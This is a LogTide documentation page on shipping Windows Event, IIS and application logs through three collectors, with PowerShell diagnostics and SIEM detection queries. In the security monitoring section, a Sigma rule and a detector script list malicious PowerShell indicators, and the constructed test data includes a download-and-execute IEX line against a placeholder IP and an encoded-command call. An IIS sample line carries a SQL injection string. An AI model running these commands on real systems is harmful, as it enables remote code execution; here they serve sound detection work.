Windows Endpoint Monitoring
Collect logs from Windows servers and workstations including Event Logs, IIS, and application logs. Perfect for SIEM labs and enterprise monitoring.
SIEM Lab Ready
This guide covers Windows log collection for security monitoring and SIEM use cases. All methods use LogTide's native OpenTelemetry (OTLP) endpoint for log ingestion.
Overview
LogTide can receive logs from Windows endpoints through several methods. All options send logs via OTLP (OpenTelemetry Protocol) or HTTP to LogTide's API.
- OpenTelemetry Collector: official CNCF project with native Windows support.
- Fluent Bit: lightweight agent with Windows Event Log support.
- NXLog: enterprise-grade log collector with a free Community Edition.
Option 1: OpenTelemetry Collector
The OpenTelemetry Collector is the recommended approach for Windows log collection. It supports Windows Event Logs natively and sends data directly to LogTide's OTLP endpoint.
1. Download the Collector
Download the latest Windows release from the OpenTelemetry Collector releases page. Choose the otelcol-contrib distribution, which includes the Windows Event Log receiver.
# Download using PowerShell (adjust version as needed)
$version = "0.96.0"
$url = "https://github.com/open-telemetry/opentelemetry-collector-releases/releases/download/v$version/otelcol-contrib_$($version)_windows_amd64.tar.gz"
Invoke-WebRequest -Uri $url -OutFile "otelcol-contrib.tar.gz"
# Before extracting, compare the archive's SHA-256 (Get-FileHash) with the
# checksums file published on the same release page
# Extract
tar -xzf otelcol-contrib.tar.gz
# Move to Program Files
New-Item -ItemType Directory -Force -Path "C:\Program Files\OpenTelemetry Collector"
Move-Item otelcol-contrib.exe "C:\Program Files\OpenTelemetry Collector\"
2. Create Configuration File
Create C:\Program Files\OpenTelemetry Collector\config.yaml:
# OpenTelemetry Collector configuration for Windows
# Sends Windows Event Logs to LogTide via OTLP/HTTP
receivers:
  # One windowseventlog receiver per channel
  windowseventlog:
    channel: Application
  windowseventlog/security:
    channel: Security
  windowseventlog/system:
    channel: System

processors:
  # Batch logs for efficient transmission
  batch:
    timeout: 5s
    send_batch_size: 100
  # Populate host.name from the operating system. The resource processor's
  # from_attribute only copies an existing resource attribute, and the receiver
  # sets none named "computer", so the resourcedetection processor is used instead.
  resourcedetection:
    detectors: [system]
    system:
      hostname_sources: [os]
  # Tag every record with the service name used in LogTide searches
  resource:
    attributes:
      - key: service.name
        value: "windows-eventlog"
        action: insert

exporters:
  # Send to LogTide Cloud. To keep the key out of the file, set a machine-level
  # environment variable for the service account and reference it as
  # "${env:LOGTIDE_API_KEY}"; the collector expands it at load time.
  otlphttp/logtide:
    endpoint: https://api.logtide.dev
    headers:
      X-API-Key: "lp_your_api_key_here"
  # Or send to self-hosted LogTide over plain HTTP (lab use only: no transport
  # encryption, so the API key and event contents cross the network in the clear)
  # otlphttp/logtide:
  #   endpoint: http://your-logtide-server:8080
  #   headers:
  #     X-API-Key: "lp_your_api_key_here"
  #   tls:
  #     insecure: true

service:
  pipelines:
    logs:
      receivers:
        - windowseventlog
        - windowseventlog/security
        - windowseventlog/system
      processors: [resourcedetection, resource, batch]
      exporters: [otlphttp/logtide]
3. Install as Windows Service
Run PowerShell as Administrator. New-Service avoids the nested-quote problems of passing an sc.exe binPath through PowerShell; the service runs as LocalSystem by default, which can read the Security channel:
# Create the Windows service (the binary path must quote both the executable and the config path)
New-Service -Name "OpenTelemetry Collector" -DisplayName "OpenTelemetry Collector" `
    -BinaryPathName '"C:\Program Files\OpenTelemetry Collector\otelcol-contrib.exe" --config="C:\Program Files\OpenTelemetry Collector\config.yaml"' `
    -StartupType Automatic
# Start the service
Start-Service -Name "OpenTelemetry Collector"
# Check status
Get-Service -Name "OpenTelemetry Collector"
Verify Installation
After starting the service, check LogTide for incoming logs.
You should see Windows Event Logs appearing within a few seconds.
Filter by service:windows-eventlog to find them.
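If nothing shows up, the cause is almost always one of a handful of local problems: the service is not running or runs as an account that cannot read the Security channel, the config does not parse, logon auditing is switched off so no events are generated, or the outbound path is blocked. The script below is an added example, not part of LogTide or the OpenTelemetry Collector; it assumes the service name and paths from the steps above, that the collector logs to the Application log under its service name, and the CSV column names printed by auditpol /r. Save it as Test-LogTideCollector.ps1 and run it from an elevated PowerShell.

```powershell
# Added example (not LogTide's or the Collector's own code): pre-flight checks for
# the collector installed above. Paths, service name and the auditpol column
# names are assumptions; adjust for Fluent Bit ("fluent-bit") or NXLog ("nxlog").
param(
    [string]$ServiceName  = 'OpenTelemetry Collector',
    [string]$CollectorExe = 'C:\Program Files\OpenTelemetry Collector\otelcol-contrib.exe',
    [string]$ConfigPath   = 'C:\Program Files\OpenTelemetry Collector\config.yaml',
    [string]$LogTideHost  = 'api.logtide.dev',
    [int]   $LogTidePort  = 443
)

$checks = [ordered]@{}

# 1. Service installed, running, and the account it runs under. Services created
#    with New-Service/sc.exe run as LocalSystem, which can read the Security channel.
$svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
$checks['Service'] = if ($svc) { "$($svc.State), account $($svc.StartName)" } else { 'NOT INSTALLED' }

# 2. A non-system service account must be in Event Log Readers to read Security.
#    Names are compared with whitespace removed ("NT AUTHORITY\LocalService" vs "LOCAL SERVICE").
if ($svc -and $svc.StartName -notin 'LocalSystem', 'NT AUTHORITY\SYSTEM') {
    $readers = Get-LocalGroupMember -Group 'Event Log Readers' -ErrorAction SilentlyContinue
    $isMember = ($readers.Name -replace '\s', '') -contains ($svc.StartName -replace '\s', '')
    $checks['EventLogReaders'] = if ($isMember) { 'member' } else { "MISSING: $($svc.StartName)" }
}

# 3. Config parses: the collector's own validate subcommand exits 0 on success
if (Test-Path $CollectorExe) {
    & $CollectorExe validate --config=$ConfigPath *> $null
    $checks['Config'] = if ($LASTEXITCODE -eq 0) { 'valid' } else { "INVALID (exit code $LASTEXITCODE)" }
}

# 4. API key pasted into the file instead of supplied through ${env:...}
if (Test-Path $ConfigPath) {
    $plain = Select-String -Path $ConfigPath -Pattern 'X-API-Key:\s*"?lp_' -Quiet
    $checks['ApiKey'] = if ($plain) { 'WARN: plaintext key in config file' } else { 'not in file' }
}

# 5. Can this session read the Security channel at all?
try {
    Get-WinEvent -LogName Security -MaxEvents 1 -ErrorAction Stop | Out-Null
    $checks['SecurityLog'] = 'readable'
} catch {
    $checks['SecurityLog'] = "NOT READABLE: $($_.Exception.Message)"
}

# 6. Failed logons (4625) are only written when failure auditing for Logon is on.
#    Assumes auditpol /r emits a CSV with an "Inclusion Setting" column.
try {
    $policy = auditpol /get /subcategory:Logon /r | ConvertFrom-Csv
    $checks['LogonAudit'] = ($policy | Select-Object -First 1).'Inclusion Setting'
} catch {
    $checks['LogonAudit'] = "unknown: $($_.Exception.Message)"
}

# 7. Outbound path to the ingest endpoint (firewall, proxy)
$tcp = Test-NetConnection -ComputerName $LogTideHost -Port $LogTidePort -WarningAction SilentlyContinue
$checks['Network'] = if ($tcp.TcpTestSucceeded) { "tcp/$LogTidePort reachable" } else { "tcp/$LogTidePort BLOCKED" }

# 8. Recent error-level events the collector wrote to the Application log
$recent = Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = $ServiceName; Level = 2 } `
    -MaxEvents 3 -ErrorAction SilentlyContinue
$checks['CollectorErrors'] = if ($recent) { ($recent.Message -split "`n")[0] } else { 'none' }

[pscustomobject]$checks | Format-List
```

Check 5 tests the account running the script, not the service account; check 2 covers the service account's group membership, and a group change only takes effect after the service restarts.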
Option 2: Fluent Bit for Windows
Fluent Bit has native Windows support and can collect Windows Event Logs, file-based logs, and more.
1. Download and Install
Download the Windows installer from Fluent Bit's official download page.
# Download using PowerShell (adjust version as needed)
$version = "3.2.2"
$url = "https://packages.fluentbit.io/windows/fluent-bit-$version-win64.exe"
Invoke-WebRequest -Uri $url -OutFile "fluent-bit-installer.exe"
# Run installer (or use silent install)
.\fluent-bit-installer.exe /S
2. Configure Fluent Bit
Edit C:\Program Files\fluent-bit\conf\fluent-bit.conf:
[SERVICE]
    Flush        5
    Daemon       Off
    Log_Level    info
    # Parser definitions (the built-in "json" parser and the IIS parser added later on this page)
    Parsers_File C:\Program Files\fluent-bit\conf\parsers.conf

# =============================================================================
# INPUT - Windows Event Logs
# winevtlog uses the modern Event Log API and emits the numeric Level and
# ProviderName fields that the level-mapping script below relies on; the older
# winlog input does not.
# =============================================================================
[INPUT]
    Name         winevtlog
    Channels     Application,System,Security
    Interval_Sec 1
    # Position database so a restart neither re-reads nor skips events
    DB           C:\Program Files\fluent-bit\winevtlog.sqlite
    Tag          windows.eventlog

# =============================================================================
# FILTER - Add metadata
# =============================================================================
[FILTER]
    Name   record_modifier
    Match  windows.*
    Record service windows-eventlog
    Record hostname ${COMPUTERNAME}

[FILTER]
    Name   lua
    Match  windows.*
    script C:\Program Files\fluent-bit\conf\map_level.lua
    call   map_windows_level

# =============================================================================
# OUTPUT - Send to LogTide via OTLP
# =============================================================================
[OUTPUT]
    Name     opentelemetry
    Match    *
    # LogTide Cloud
    Host     api.logtide.dev
    Port     443
    # out_opentelemetry takes the logs path as Logs_uri ("Uri" is an out_http option)
    Logs_uri /v1/otlp/logs
    Tls      On
    # Verify the server certificate (the default, stated explicitly so it is not lost in copies)
    Tls.verify On
    Header   X-API-Key lp_your_api_key_here
    # For self-hosted LogTide over plain HTTP (lab use only, no transport encryption), use:
    # Host your-logtide-server
    # Port 8080
    # Tls  Off
3. Create Level Mapping Script
Create C:\Program Files\fluent-bit\conf\map_level.lua:
-- Map Windows Event Log levels to LogTide levels.
-- winevtlog emits Level as a number: 0=LogAlways, 1=Critical, 2=Error,
-- 3=Warning, 4=Information, 5=Verbose
function map_windows_level(tag, timestamp, record)
    local level_map = {
        [0] = "info",
        [1] = "critical",
        [2] = "error",
        [3] = "warn",
        [4] = "info",
        [5] = "debug"
    }
    -- Level may arrive as a number or a numeric string; default to Information
    local win_level = tonumber(record["Level"]) or 4
    record["level"] = level_map[win_level] or "info"

    -- Use the rendered Message field as the log message
    if record["Message"] then
        record["message"] = record["Message"]
    end

    -- Use the event provider as the service name (ProviderName from winevtlog,
    -- SourceName from the older winlog input). This overrides the
    -- "windows-eventlog" default set by the record_modifier filter, so searches
    -- must use the provider name (e.g. Microsoft-Windows-Security-Auditing).
    local provider = record["ProviderName"] or record["SourceName"]
    if provider then
        record["service"] = provider
    end

    -- 1 = record modified; keep the original timestamp
    return 1, timestamp, record
end
4. Start the Service
# If the installer did not register a service, create one (runs as LocalSystem)
New-Service -Name fluent-bit -StartupType Automatic `
    -BinaryPathName '"C:\Program Files\fluent-bit\bin\fluent-bit.exe" -c "C:\Program Files\fluent-bit\conf\fluent-bit.conf"'
# Start Fluent Bit service
sc.exe start fluent-bit
# Or restart if already running
sc.exe stop fluent-bit
sc.exe start fluent-bit
# Check status
sc.exe query fluent-bit
Option 3: NXLog
NXLog Community Edition is a free, enterprise-grade log collector with excellent Windows support. It can send logs to LogTide's HTTP API.
1. Download and Install
Download NXLog Community Edition from nxlog.co and run the installer.
2. Configure NXLog
Edit C:\Program Files\nxlog\conf\nxlog.conf:
## NXLog Configuration for LogTide
define ROOT    C:\Program Files\nxlog
define CERTDIR %ROOT%\cert
define CONFDIR %ROOT%\conf
define LOGDIR  %ROOT%\data

Moduledir %ROOT%\modules
CacheDir  %ROOT%\data
Pidfile   %ROOT%\data\nxlog.pid
SpoolDir  %ROOT%\data
LogFile   %ROOT%\data\nxlog.log

<Extension json>
    Module xm_json
</Extension>

# Windows Event Log input
<Input eventlog>
    Module im_msvistalog
    Query <QueryList>\
            <Query Id="0">\
              <Select Path="Application">*</Select>\
              <Select Path="System">*</Select>\
              <Select Path="Security">*</Select>\
            </Query>\
          </QueryList>
</Input>

# Transform to LogTide format
<Processor transform>
    Module pm_null
    <Exec>
        # Map the Windows event type to a LogTide level. im_msvistalog sets
        # $EventType to CRITICAL, ERROR, WARNING, INFO, VERBOSE, AUDIT_SUCCESS or
        # AUDIT_FAILURE; failed audits are raised to "warn" so Security-channel
        # failures are not buried among informational events.
        if $EventType == "CRITICAL" $level = "critical";
        else if $EventType == "ERROR" $level = "error";
        else if $EventType == "WARNING" $level = "warn";
        else if $EventType == "AUDIT_FAILURE" $level = "warn";
        else $level = "info";

        # Required fields
        if not defined $Message $Message = "";
        if not defined $SourceName $SourceName = "unknown";
        $service = $SourceName;
        # NXLog's special format gives an RFC 3339 UTC timestamp; the C-style
        # "%Y-%m-%dT%H:%M:%SZ" would format local time with a misleading Z.
        $time = strftime($EventTime, "YYYY-MM-DDThh:mm:ssUTC");

        # The NXLog language has no map literal and to_json() serializes the whole
        # event, so the JSON is assembled by hand. Escape the free-text message:
        # backslashes first, then quotes, then control characters.
        $message = replace($Message, "\\", "\\\\");
        $message = replace($message, '"', '\"');
        $message = replace($message, "\r", "");
        $message = replace($message, "\n", "\\n");
        $message = replace($message, "\t", "\\t");

        # Event metadata (the machine name is $Hostname in im_msvistalog)
        $metadata = '{"EventID":' + string($EventID) + ',"Channel":"' + $Channel + '","Computer":"' + $Hostname + '"}';
    </Exec>
</Processor>

# Output to LogTide HTTP API
<Output logtide>
    Module      om_http
    URL         https://api.logtide.dev/api/v1/ingest/single
    # For self-hosted: http://your-server:8080/api/v1/ingest/single
    # If NXLog cannot verify the server certificate, point HTTPSCAFile at a CA
    # bundle rather than setting HTTPSAllowUntrusted.
    ContentType application/json
    AddHeader   X-API-Key: lp_your_api_key_here
    <Exec>
        # One JSON document per event; $metadata is already a JSON object
        $raw_event = '{"time":"' + $time + '","level":"' + $level + '","service":"' + $service + '","message":"' + $message + '","metadata":' + $metadata + '}';
    </Exec>
</Output>

# Route: eventlog -> transform -> logtide
<Route 1>
    Path eventlog => transform => logtide
</Route>
3. Start NXLog Service
# Start NXLog service
net start nxlog
# Check status
sc.exe query nxlog
Collecting Windows Event Logs
Windows Event Logs are the primary source for system and security monitoring. Here are the key channels to collect for SIEM use cases:
| Channel | Description | SIEM Priority |
|---|---|---|
| Security | Logon events, privilege use, audit policy changes | Critical |
| System | Service starts/stops, driver issues, hardware events | High |
| Application | Application errors, warnings, and information | Medium |
| Microsoft-Windows-Sysmon/Operational | Process creation, network connections, file changes (requires Sysmon) | Critical |
| Microsoft-Windows-PowerShell/Operational | PowerShell script execution, module loading | Critical |
| Microsoft-Windows-Windows Defender/Operational | Antivirus detections, scan results | High |
Install Sysmon for Enhanced Visibility
For security monitoring, install Microsoft Sysmon to capture process creation, network connections, and file modifications. Use the SwiftOnSecurity config as a starting point.
Extended Event Log Collection (OpenTelemetry)
To collect additional channels with OpenTelemetry Collector, add more receivers:
# Add these receivers to the configuration above; processors and exporters are unchanged
receivers:
  # Sysmon logs (requires Sysmon installed)
  windowseventlog/sysmon:
    channel: Microsoft-Windows-Sysmon/Operational
  # PowerShell logs (script block logging, Event ID 4104, must be enabled by policy)
  windowseventlog/powershell:
    channel: Microsoft-Windows-PowerShell/Operational
  # Windows Defender
  windowseventlog/defender:
    channel: Microsoft-Windows-Windows Defender/Operational
  # Remote Desktop session events
  windowseventlog/rdp:
    channel: Microsoft-Windows-TerminalServices-LocalSessionManager/Operational

service:
  pipelines:
    logs:
      receivers:
        - windowseventlog
        - windowseventlog/security
        - windowseventlog/system
        - windowseventlog/sysmon
        - windowseventlog/powershell
        - windowseventlog/defender
        - windowseventlog/rdp
      processors: [resource, batch]
      exporters: [otlphttp/logtide]
Collecting IIS Logs
IIS (Internet Information Services) logs can be collected using file-based input.
By default, IIS logs are stored in C:\inetpub\logs\LogFiles.
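IIS W3C files start with header lines (#Software, #Version, #Date, #Fields) and the #Fields line defines the column order, which changes when a site's logging fields are customised. The script below is an added example, not LogTide's or Fluent Bit's code: it parses W3C lines driven by the #Fields header rather than a fixed regex, so it also handles a non-default layout, and it produces the same field names (cs_user_agent, sc_status, ...) that the Fluent Bit parser further down this page uses. The log lines are constructed for the example; replace them with Get-Content on a real W3SVC file.

```powershell
# Added example (editor's code, not part of LogTide or Fluent Bit): #Fields-driven
# IIS W3C parser. Sample lines below are constructed, not real server output.

function ConvertFrom-IisW3CLog {
    param([string[]]$Lines)

    $fields = $null
    foreach ($line in $Lines) {
        if ($line.StartsWith('#')) {
            # Header lines carry no request; #Fields defines the column order
            if ($line.StartsWith('#Fields:')) {
                $fields = $line.Substring(8).Trim() -split ' ' | ForEach-Object {
                    # cs(User-Agent) -> cs_user_agent, matching the Fluent Bit parser names
                    ($_ -replace '[()\-]+', '_').Trim('_').ToLower()
                }
            }
            continue
        }
        if (-not $fields) { Write-Warning "Data line before #Fields header: $line"; continue }

        $values = $line -split ' '
        if ($values.Count -ne $fields.Count) {
            # A mismatch usually means the site uses a different logExtFileFlags set
            Write-Warning "Field count mismatch ($($values.Count) vs $($fields.Count)): $line"
            continue
        }
        $record = [ordered]@{}
        for ($i = 0; $i -lt $fields.Count; $i++) { $record[$fields[$i]] = $values[$i] }

        # IIS logs in UTC by default: combine date + time into one UTC timestamp
        $record['timestamp'] = [datetime]::ParseExact("$($record.date) $($record.time)",
            'yyyy-MM-dd HH:mm:ss', [cultureinfo]::InvariantCulture,
            [System.Globalization.DateTimeStyles]'AssumeUniversal, AdjustToUniversal')
        # Decode the query string so injection attempts are readable in searches
        if ($record['cs_uri_query'] -and $record['cs_uri_query'] -ne '-') {
            $record['query_decoded'] = [uri]::UnescapeDataString($record['cs_uri_query'] -replace '\+', ' ')
        }
        [pscustomobject]$record
    }
}

# Constructed sample log with the default IIS 10 field set
$sample = @'
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-05-01 12:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 12:00:01 10.0.0.5 GET /index.html - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 15
2024-05-01 12:00:02 10.0.0.5 GET /login.aspx id=1%27+OR+1%3D1-- 443 - 203.0.113.7 sqlmap/1.7 - 500 0 0 120
2024-05-01 12:00:03 10.0.0.5 POST /login.aspx - 443 - 198.51.100.9 Mozilla/5.0 - 401 2 5 30
'@ -split "`r?`n"

$records = ConvertFrom-IisW3CLog -Lines $sample

# Triage view: client errors and server errors with the decoded query string
$records |
    Where-Object { [int]$_.sc_status -ge 400 } |
    Select-Object timestamp, c_ip, cs_method, cs_uri_stem, query_decoded, sc_status, cs_user_agent |
    Format-Table -AutoSize
```

The field-count check is the important part: when it fires on a real file, the fixed regex in the Fluent Bit parser will fail on every line of that site as well, and the #Fields line tells you the order to put in the regex.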
Fluent Bit IIS Configuration
Add this to your Fluent Bit configuration:
# IIS log collection
[INPUT]
    Name             tail
    Path             C:\inetpub\logs\LogFiles\W3SVC*\*.log
    Tag              iis.access
    Read_from_Head   False
    Refresh_Interval 5
    Skip_Long_Lines  On
    # Position database so files are not re-read after a restart
    DB               C:\Program Files\fluent-bit\iis.sqlite
    Exclude_Path     *.old

# Drop the W3C header lines (#Software, #Version, #Date, #Fields); they do not
# match the parser. Exclude_Path above only filters file names, not lines.
[FILTER]
    Name    grep
    Match   iis.*
    Exclude log ^#

[FILTER]
    Name     parser
    Match    iis.*
    Key_Name log
    Parser   iis_log

[FILTER]
    Name   record_modifier
    Match  iis.*
    Record service iis
    Record level   info

# Omit this block if the main configuration already has an opentelemetry
# output matching *, otherwise IIS records are delivered twice
[OUTPUT]
    Name     opentelemetry
    Match    iis.*
    Host     api.logtide.dev
    Port     443
    Logs_uri /v1/otlp/logs
    Tls      On
    Header   X-API-Key lp_your_api_key_here
IIS Parser
Add this parser to your parsers config:
# IIS W3C log format parser for the default field set. Check the #Fields header
# of your log files and adjust the order if a site logs different columns.
[PARSER]
    Name        iis_log
    Format      regex
    Regex       ^(?<time>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?<s_ip>[^ ]+) (?<cs_method>[^ ]+) (?<cs_uri_stem>[^ ]+) (?<cs_uri_query>[^ ]+) (?<s_port>[^ ]+) (?<cs_username>[^ ]+) (?<c_ip>[^ ]+) (?<cs_user_agent>[^ ]+) (?<cs_referer>[^ ]+) (?<sc_status>[^ ]+) (?<sc_substatus>[^ ]+) (?<sc_win32_status>[^ ]+) (?<time_taken>[^ ]+)$
    # date and time are captured together so the record gets a full timestamp;
    # a time-only format would leave the date undefined. IIS writes UTC by default.
    Time_Key    time
    Time_Format %Y-%m-%d %H:%M:%S
    Time_Offset +0000
    Time_Keep   On
    Types       sc_status:integer sc_substatus:integer sc_win32_status:integer time_taken:integer
Collecting Application Logs
For custom application logs stored in files, use the tail input:
# Custom application log files
[INPUT]
    Name             tail
    Path             C:\Apps\MyApp\logs\*.log
    Tag              app.myapp
    Read_from_Head   False
    Refresh_Interval 5
    # For JSON formatted logs (the json parser comes from the Parsers_File set in [SERVICE])
    Parser           json

[INPUT]
    Name             tail
    Path             C:\Apps\AnotherApp\logs\app.log
    Tag              app.anotherapp
    Read_from_Head   False
    # For plain text logs where stack traces span several lines. The
    # multiline_start parser must be defined in parsers.conf (a regex matching
    # the first line of an entry); newer Fluent Bit versions use
    # multiline.parser with a [MULTILINE_PARSER] definition instead.
    Multiline        On
    Parser_Firstline multiline_start

[FILTER]
    Name   record_modifier
    Match  app.myapp
    Record service myapp

[FILTER]
    Name   record_modifier
    Match  app.anotherapp
    Record service anotherapp
Security Monitoring
Once Windows logs are flowing into LogTide, you can use Sigma rules for security detection. The queries below use the field names from this page (service and metadata.EventID). Note that the three collectors populate service differently: the OpenTelemetry Collector config above sets it to windows-eventlog for every channel, while the Fluent Bit and NXLog configs use the event provider name (for example Microsoft-Windows-Security-Auditing or Microsoft-Windows-Sysmon), so adjust the service filter to match your pipeline.
Event ID 4625 - Failed logon attempts (only generated when failure auditing for Logon is enabled in the audit policy)
service:windows-eventlog AND metadata.EventID:4625
Event ID 7045 - New service installed (System channel; a common persistence artefact)
service:windows-eventlog AND metadata.EventID:7045
Sysmon Event ID 1 - Process created
service:Sysmon AND metadata.EventID:1
PowerShell script block logging (Event ID 4104; script blocks PowerShell flags as suspicious are logged at Warning level, the rest at Verbose)
service:PowerShell AND metadata.EventID:4104 AND level:warn
Example Sigma Rule: Suspicious PowerShell
title: Suspicious PowerShell Command
status: stable
logsource:
  product: windows
  service: powershell
detection:
  selection:
    message|contains:
      - 'Invoke-Expression'
      - 'IEX'
      - 'DownloadString'
      - 'EncodedCommand'
      - '-enc'
  condition: selection
level: high
Troubleshooting
No logs arriving in LogTide:
- Check that the service is running: sc.exe query "service-name"
- Verify the API key in the config file is correct
- Check the collector's own logs: the OpenTelemetry Collector writes to the Windows Application event log, Fluent Bit to C:\Program Files\fluent-bit\log
- Test network connectivity to the LogTide endpoint
- Ensure Windows Firewall allows outbound HTTPS (443) or, for self-hosted HTTP, port 8080
Access denied on the Security channel:
The Security event log requires elevated permissions. Ensure the service runs as:
- the Local System account (the default for services created with New-Service or sc.exe), or
- a user in the "Event Log Readers" group
# Add the service account to Event Log Readers (takes effect after the service restarts)
net localgroup "Event Log Readers" "NT AUTHORITY\LOCAL SERVICE" /add
High event volume:
- Increase batch size and timeout to reduce API calls
- Filter out noisy/unnecessary event IDs
- Use XPath queries to limit collected events
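When a query from the Security Monitoring section returns nothing, confirm the events exist on the host before suspecting the pipeline. The script below is an added example (not LogTide's code): it implements that section's failed-logon and suspicious-script-block detections in PowerShell, first over constructed sample records so it runs anywhere, then optionally over the live Security and PowerShell logs. The EventData names used (IpAddress, TargetUserName, ScriptBlockText) are the real ones for events 4625 and 4104; the burst threshold and time window are lab assumptions.

```powershell
# Added example (editor's code, not part of LogTide): local versions of the
# 4625 burst and suspicious-script-block detections. Sample data is constructed.

# Same indicators as the Sigma rule's selection (case-insensitive substring match)
$SuspiciousPatterns = 'Invoke-Expression', 'IEX', 'DownloadString', 'EncodedCommand', '-enc'

function Test-SuspiciousScriptBlock {
    param([string]$ScriptBlockText)
    # Returns the matched indicators; an empty array means no hit
    @($SuspiciousPatterns | Where-Object { $ScriptBlockText.IndexOf($_, [StringComparison]::OrdinalIgnoreCase) -ge 0 })
}

function Find-LogonFailureBursts {
    param(
        [object[]]$Events,          # objects with Time, IpAddress, TargetUserName
        [int]$Threshold = 5,        # this many failures from one source IP ...
        [int]$WindowMinutes = 5     # ... inside this sliding window (assumed lab values)
    )
    foreach ($group in ($Events | Group-Object IpAddress)) {
        $times = @($group.Group | Sort-Object Time | ForEach-Object { $_.Time })
        for ($i = 0; $i + $Threshold - 1 -lt $times.Count; $i++) {
            $span = $times[$i + $Threshold - 1] - $times[$i]
            if ($span.TotalMinutes -le $WindowMinutes) {
                [pscustomobject]@{
                    IpAddress = $group.Name
                    Failures  = $group.Count
                    Users     = ($group.Group.TargetUserName | Sort-Object -Unique) -join ','
                    FirstSeen = $times[$i]
                }
                break   # one alert per source IP
            }
        }
    }
}

# Convert a real 4625 EventRecord into the shape Find-LogonFailureBursts expects
function ConvertFrom-LogonFailureEvent {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time           = $Event.TimeCreated
        IpAddress      = $data['IpAddress']
        TargetUserName = $data['TargetUserName']
        LogonType      = $data['LogonType']
    }
}

# --- Constructed sample data (not real log output) ---
$t0 = Get-Date '2024-05-01T12:00:00'
$sampleFailures = @(
    0, 1, 2, 3, 4, 5 | ForEach-Object {
        # six failures in one minute from one IP, each against a different account (password spraying)
        [pscustomobject]@{ Time = $t0.AddSeconds(10 * $_); IpAddress = '203.0.113.7'; TargetUserName = "user$_" }
    }
    [pscustomobject]@{ Time = $t0.AddMinutes(30); IpAddress = '198.51.100.9'; TargetUserName = 'alice' }
)
$sampleScriptBlocks = @(
    'Get-ChildItem C:\Temp | Measure-Object',
    'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.7/a.ps1")',
    'powershell.exe -nop -w hidden -enc SQBFAFgA'
)

Find-LogonFailureBursts -Events $sampleFailures | Format-Table -AutoSize
foreach ($sb in $sampleScriptBlocks) {
    $hits = Test-SuspiciousScriptBlock $sb
    if ($hits.Count) { "ALERT [$($hits -join ', ')]: $sb" }
}

# Live data (run elevated or as a member of Event Log Readers):
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625 } -MaxEvents 500 |
#             ForEach-Object { ConvertFrom-LogonFailureEvent $_ }
# Find-LogonFailureBursts -Events $live
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 200 |
#     Where-Object { (Test-SuspiciousScriptBlock $_.Properties[2].Value).Count }
```

On the sample data the first IP trips the burst rule and the second does not, and the last two script blocks match the indicators. If the live 4625 query returns no events at all, check the audit policy before anything else: without failure auditing for Logon, nothing is written for the collector to ship.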
Test Log Ingestion
Generate a test event to verify the pipeline:
# Register a dedicated event source once (requires an elevated PowerShell), then
# write a test event to the Application log. Write-EventLog needs a registered
# source, so a dedicated one is safer than reusing an existing provider name.
if (-not [System.Diagnostics.EventLog]::SourceExists("LogTideTest")) {
    New-EventLog -LogName Application -Source "LogTideTest"
}
Write-EventLog -LogName Application -Source "LogTideTest" -EventId 1000 -EntryType Information -Message "Test log message for LogTide"
# Then search LogTide for the message text. The service value depends on the collector:
# windows-eventlog for the OpenTelemetry Collector config above, or the provider name
# (here LogTideTest) for the Fluent Bit and NXLog configs.
You're All Set!
Your Windows endpoint is now sending logs to LogTide. Use the search and filter features to explore your logs, set up alerts for important events, and enable Sigma rules for security monitoring.
Related documentation: OpenTelemetry Integration • Syslog Integration • API Reference